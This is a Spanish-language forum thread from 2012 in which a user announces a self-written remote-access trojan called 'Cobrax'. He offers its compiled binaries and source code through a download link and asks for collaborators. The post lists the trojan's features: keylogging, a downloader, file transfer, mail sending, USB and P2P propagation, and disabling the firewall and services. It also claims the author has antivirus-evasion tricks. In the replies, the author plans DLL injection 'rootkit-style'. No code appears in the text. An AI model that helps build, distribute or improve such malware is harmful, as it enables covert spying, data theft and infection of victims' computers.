Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: hacker83 en 1 Junio 2012, 06:56 am



Título: [C/C++] Troyano Cobrax - BETA
Publicado por: hacker83 en 1 Junio 2012, 06:56 am
Bueno antes que nada quiero aclarar que este troyano lo desarrolle en menos de 3 dias, no le llega ni a los talones a un troyano verdadero tales como bifrost, spy net, poison, etc. pero solo me intereso la idea de tratar de desarrollar algun tipo de troyano. ya que previamente habia hecho varias funciones FUD con cosas tales como generar Autoruns indetectables a los 42 antivirus, asi como un downloader encryptado  en su llamado. como inyeccion de api shellexecute en otro proceso,etc.

El servidor lo programe en C++ y el cliente en VB. Como sabran yo de VB no se nada y de C me defiendo, podria mejorarle muchas cosas pero como que trabajar solo en el proyecto no me gusta, se me hace mejor como de a mas personas...

Al que este interesado me gustaría que avise por comentarios o por donde sea, mp, msn.

Desarrollar el entorno del cliente en C++ me tomaría mucho tiempo asi que por eso decidí hacerlo en VB al menos como para comprobar si las funciones andan.
No le puse para capturar la pantalla ni la cámara web, tengo para hacerlo y el método keylogger que utiliza es diferente al HOOK y al uso simple de la API GetAsyncKeyState. lo probe y funciona perfecto. tienes opciones tales como


*Abrir el cd
*Apagar el monitor
*Envio de mensajes
*Downloader (Falta configurar cliente)
*Envio de archivos (falta configurar cliente)
*Desarrollando el metodo de Compresión ZIP basado en el worm MyDoom
*Apagado de ordenador
*Manejo de procesos
*Eliminar archivos
*Ejecutar archivos
*Alocar el mouse
*Invertir botones el mouse
*Envio de teclas
*Desactivado de servicios
*Kill de utilidades del sistema
*Firewall de Windows.
*Bloqueo de ventanas.
*Recibir archivos
*Envio de MAIL motor SMTP GMAIL.
*Propagacion USB | ARES.

*Tiene bastante estabilidad por lo que llege a testear entre PC's de prueba.


Les dejo los compilados Junto con sus respectivos Sources.

http://www.mediafire.com/?xq3cd1efqkkbjie (http://www.mediafire.com/?xq3cd1efqkkbjie)

Saludos!

PD: Ojala alguno quiera participar!  :P


Título: Re: [C/C++] Troyano Cobrax - BETA
Publicado por: 0xDani en 1 Junio 2012, 15:50 pm
Bueno parece que esta bien, habra que leer algo de codigo. Una pregunta, esta hecho con la API de windows? Y bueno puede que me interese hacer algo en C(aunque mejor C++), pero no me hables de VB.

Saludos ;D


Título: Re: [C/C++] Troyano Cobrax - BETA
Publicado por: 79137913 en 1 Junio 2012, 16:41 pm
HOLA!!!

Lamento decirte que el metodo CATCH (API GetAsyncKeyState. ) No es nada recomendable ya que consume mucho recurso verificar constantemente la pulsacion de alguna tecla... Aparte se pueden pasar teclas y combinaciones sin que vos te enteres.

GRACIAS POR LEER!!!


Título: Re: [C/C++] Troyano Cobrax - BETA
Publicado por: hacker83 en 1 Junio 2012, 19:52 pm
Si eso estaba enterado, no queria depender de la DLL para hacer el HOOK en el keyboard  :rolleyes: si a mi vb mucho no me llevo, Ja asi que aquel que quiera colaborar el servidor esta en C++! ya lo estoy cambiando, y si esta desarrollado con WINAPI.
y no va a quedar otra que desarollar el HOOK y atravez del downloader que trae incoporado descargar la libreria y ya que esta que la inyecte y sea tipo rootkit.  :laugh: